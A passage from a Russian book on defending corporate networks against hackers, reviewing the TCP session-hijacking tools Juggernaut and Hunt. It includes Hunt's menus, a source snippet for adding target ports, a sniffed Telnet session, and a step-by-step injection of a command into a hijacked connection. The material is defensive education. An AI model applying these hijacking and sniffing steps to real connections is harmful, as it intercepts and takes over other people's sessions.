Коллектив авторов - Защита от хакеров корпоративных сетей

Current Connection Database:

–

ref # source target

(1) 10.0.0.5 [2211] –> 10.0.0.10 [23]

–

Choose a connection [q] > 1

Spying on connection, hit “ctrl-c” when you want to hijack.

NOTE: This will cause an ACK storm and desynch the client

until the connection is RST.

Spying on connection: 10.0.0.5 [2211] –> 10.0.0.10 [23]

Автор программы Juggernaut больше не поддерживает и не улучшает ее. Создается впечатление, что никто не делает этого, по крайней мере открыто. Автор программы Juggernaut написал усовершенствованную версию Juggernaut++ и однажды показал, как выглядят экранные формы программы, но он никогда не выпускал версию этой программ для всеобщего использования.

К моменту написания книги программе Juggernaut исполнилось уже несколько лет. Это большой промежуток времени для инструментальных средств обеспечения безопасности, а особенно для программы, которая активно не разрабатывается. У программы есть некоторые ограничения. Например, нельзя осуществить повторную синхронизацию соединения, а также невозможно работать с соединениями, в которых участвуют хосты с запущенной на них программой Juggernaut. Тем не менее эта программа будет работать на любых TCP-портах. (Другие инструментальные средства работают с Telnet или аналогичными протоколами.) Программа Juggernaut уже не является лучшей в этом классе программ, но тем не менее с познавательной точки зрения до сих пор очень полезно прочитать о проведенных автором программы Juggernaut исследованиях. По этому поводу прочтите оригинальную статью в журнале «Phrack».

Программа Hunt

Программа Hunt была создана Павлом Краузом (Pavel Krauz). Ее текущая версия 1.5. Складывается впечатление, что на момент выхода книги активная разработка программы не велась. Версия программы 1.5 была выпущена 30 мая 2000 года. Ее можно найти по адресу: http://lin.fsid.cvut.cz/~kra/index.html#HUNT.

Hunt является более амбициозным проектом, нежели Juggernaut. По крайней мере, он развился в такой проект. В соответствии с файлом readme, поставляемым вместе с дистрибутивом, одной из причин разработки Краузом программы Hunt было желание реализовать некоторые возможности, которые не были доступны в Juggernaut.

Как и в программе Juggernaut, у программы Hunt есть режимы анализа сетевого трафика (снифинга) и перехвата сессий. В отличие от Juggernaut, в программе Hunt реализованы средства спуфинга при работе с протоколом разрешения адресов ARP. С их помощью можно переслать через атакующую машину данные, посылаемые машиной жертвой, а также избежать перегрузки сети уведомлениями ACK (ACK storm), обычно сопутствующей перехвату TCP сессии. Вот как выглядит программа Hunt при запуске:

/*

* hunt 1.5

* multipurpose connection intruder / sniffer for Linux

* (c) 1998-2000 by kra

*/

starting hunt

– Main Menu – rcvpkt 0, free/alloc 63/64 –

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

->

Строка – > является приглашением пользователя к вводу команд. После нее ожидается ввод одной из команд из списка главного меню. По умолчанию, программа Hunt настроена на Telnet– и rlogin-соединения, но она написана таким образом, что можно легко добавить поддержку других типов соединений. Для этого в расположенном в файле hunt.c коде инициализации предусмотрена следующая строка:

add telnet rlogin policy();

Этафункция находится в файле addpolicy.c и выглядит следующим образом:

void add_telnet_rlogin_policy(void)

{

struct add_policy_info *api;

api = malloc(sizeof(struct add_policy_info));

assert(api);

memset(api, 0, sizeof(sizeof(struct add_policy_info)));

api->src_addr = 0;

api->src_mask = 0;

api->dst_addr = 0;

api->dst_mask = 0;

api->src_ports[0] = 0;

api->dst_ports[0] = htons(23);

api->dst_ports[1] = htons(513);

api->dst_ports[2] = 0;

list_push(&l_add_policy, api);

};

Из исходного текста функции видно, что для добавления новых возможностей достаточно просто добавить новые номера портов и затем перекомпилировать программу. Когда программа Hunt захватывает Telnet– или rlogin-соединение, она отображает его в меню списка соединений, как показано ниже:

-> l

0) 10.0.1.1 [3014] —> 130.212.2.65 [23]

– Main Menu – rcvpkt 2664, free/alloc 63/64 –

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

Первые две строчки – это то, что нас интересует. Программа Hunt часто обновляет меню сразу после введенной команды. Из приведенной экранной формы видно, что программа Hunt обнаружила Telnet-соединение. Ниже показан вызов режима наблюдения (снифинга) за соединением.

-> w

0) 10.0.1.1 [3014] —> 130.212.2.65 [23]

choose conn> 0

dump [s]rc/[d]st/[b]oth [b]> [cr]

print src/dst same characters y/n [n]> [cr]

CTRL-C to break

llss

!»FF>»b

»»<82> <82>

<82>

<82><82><82><82><82>!

Apps/ Library/ Mailboxes/ Makefile

bookmarks.html

dead.letter mail/ proj1.c public_html/

!»»b

!futon>

“”<82> <82>

<82>

<82><82><82><82><82>

Например, пользователь программы Hunt запустил программу, захватил Telnet-соединение, выбрал режим наблюдения за ним, а затем перешел в Telnet-окно и набрал команду «ls». Команду «ls» (показанную как llss) можно увидеть ближе к началу приведенного выше протокола работы, за которой следует вывод данных в шестнадцатеричном формате, за которыми следуют файлы в директории пользователя, а затем опять шестнадцатеричный код. Вывод введенной команды «ls» в виде «llss» – результат отображения программой Hunt введенных пользователем символов с добавленным ответом сервера, возвращающего пользователю введенные им же символы. В итоге это выглядит как будто возможность вывода одних и тех же исходных и полученных символов, что работает не вполне корректно. Шестнадцатеричные символы являются форматирующими терминал-символами, которые обычно во время Telnet-сессии остаются за рамками рассмотрения. Конечно, в данном случае нас мало интересуют реализованные в программе Hunt возможности снифинга, хотя это и удобно. Главное – это понять, каким образом программа Hunt используется для перехвата сессий! Именно это демонстрируется ниже:

-> s

0) 10.0.1.1 [3014] –> 130.212.2.65 [23]

choose conn> 0

dump connection y/n [n]> [cr]

Enter the command string you wish executed or [cr]> cd Apps

!cd Apps

futon>

Тем временем вот что было отображено в Telnet-окне пользователя:

futon>

futon> cd Apps

futon>

Выходные данные были отображены на экране точно так же, как если бы они были введены в окне Telnet. Вернемся к программе Hunt:

Enter the command string you wish executed or [cr]> [cr]

[r]eset connection/[s]ynchronize/[n]one [r]> s

user have to type 8 chars and print 0 chars to synchronize

connection

CTRL-C to break

Когда пользователь нажимает клавишу Enter для завершения посылки символов от лица клиента, ему предоставляется возможность выбрать одну из перечисленных команд: сбросить соединение (прервать и возвратить его в исходное состояние), синхронизировать клиента и сервера или же оставить соединение десинхронизированным. В данном случае попытка выбора опции синхронизации соединения не увенчалась успехом, потому что в результате система была установлена в состояние ожидания. Складывалось впечатление, что ввод символов в окно Telnet не помог повторной синхронизации. Другие попытки повторной синхронизации оказались более успешными. Возможно, что на это оказали влияние такие факторы, как время ввода и длина введенной злоумышленником команды, надежность сети в этот момент (прежде всего имеется в виду потеря пакетов) и, конечно, реализация TCP.

Читать дальше